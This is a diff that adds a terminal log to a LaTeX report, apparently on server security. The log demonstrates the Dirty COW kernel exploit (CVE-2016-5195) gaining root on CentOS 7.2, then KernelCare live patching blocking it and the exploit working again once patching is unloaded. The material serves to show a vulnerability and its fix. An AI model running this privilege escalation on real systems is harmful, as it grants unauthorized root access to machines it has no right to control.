--- a/inc/5-description.tex
+++ b/inc/5-description.tex
@@ -85,4 +85,74 @@ ntp - только на винде позволяет устроить ддос
 Также в безопасность входят бекапы, фейловеры, все что соответствует SLA.
 Тут возможно сделать что-то с SDN и SDS, надо почитать.
 
+
+\begin{lstlisting}
+ETO CHISTIJ ISO CENTOS 7.2
+
+[root@master ~]# cat /etc/redhat-release
+CentOS Linux release 7.2.1511 (Core)
+[root@master ~]# uname -r
+3.10.0-327.el7.x86_64
+[root@master ~]# su dcow
+[dcow@master ~]$ id
+uid=1000(dcow) gid=1000(dcow) groups=1000(dcow) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
+[dcow@master ~]$ git clone https://github.com/gbonacini/CVE-2016-5195.git
+[dcow@master ~]$ cd CVE-2016-5195/
+[dcow@master CVE-2016-5195]$ make
+g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
+[dcow@master CVE-2016-5195]$ ./dcow
+Running ...
+Received su prompt (Password: )
+Root password is:   dirtyCowFun
+Enjoy! :-)
+[dcow@master CVE-2016-5195]$ su root
+Password:
+[root@master ~]# id
+uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
+
+
+[root@master ~]# rpm -i http://patches.kernelcare.com/kernelcare-latest.el6.x86_64.rpm
+[root@master ~]# /usr/bin/kcarectl --info
+kpatch-state: patch is applied
+kpatch-for: Linux version 3.10.0-327.el7.x86_64 (builder@kbuilder.dev.centos.org) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Thu Nov 19 22:10:57 UTC 2015
+kpatch-build-time: Mon Nov  7 17:08:08 2016
+kpatch-description: 20;3.10.0-327.36.3.el7.x86_64
+[root@master ~]# /usr/bin/kcarectl --update
+Kernel is safe
+[root@master ~]# /usr/bin/kcarectl --uname
+3.10.0-327.36.3.el7.x86_64
+[root@master ~]# /usr/bin/kcarectl --patch-info  | grep CVE-2016-5195 -A3 -B3
+kpatch-name: 3.10.0/0001-mm-remove-gup_flags-FOLL_WRITE-games-from-__get_user-327.patch
+kpatch-description: mm: remove gup_flags FOLL_WRITE games from __get_user_pages()
+kpatch-kernel: >kernel-3.10.0-327.36.2.el7
+kpatch-cve: CVE-2016-5195
+kpatch-cvss: 6.9
+kpatch-cve-url: https://access.redhat.com/security/cve/cve-2016-5195
+kpatch-patch-url: https://git.kernel.org/linus/19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619
+
+[root@master ~]# uname -r
+3.10.0-327.el7.x86_64
+
+
+PROVEROCHKA
+[dcow@master CVE-2016-5195]$ ./dcow
+Running ...
+NE RABOTAET
+
+4$/YEAR ZA 1 LICENZIUY
+
+OTKLUYCHAEM
+[root@master ~]# /usr/bin/kcarectl --unload
+Updates already downloaded
+KernelCare protection disabled, kernel might not be safe
+[root@master ~]# su - dcow
+Last login: Wed Dec  7 17:18:42 MSK 2016 on pts/0
+[dcow@master ~]$ cd CVE-2016-5195/
+[dcow@master CVE-2016-5195]$ ./dcow
+Running ...
+Received su prompt (Password: )
+Root password is:   dirtyCowFun
+Enjoy! :-)
+
+\end{lstlisting}
 \clearpage
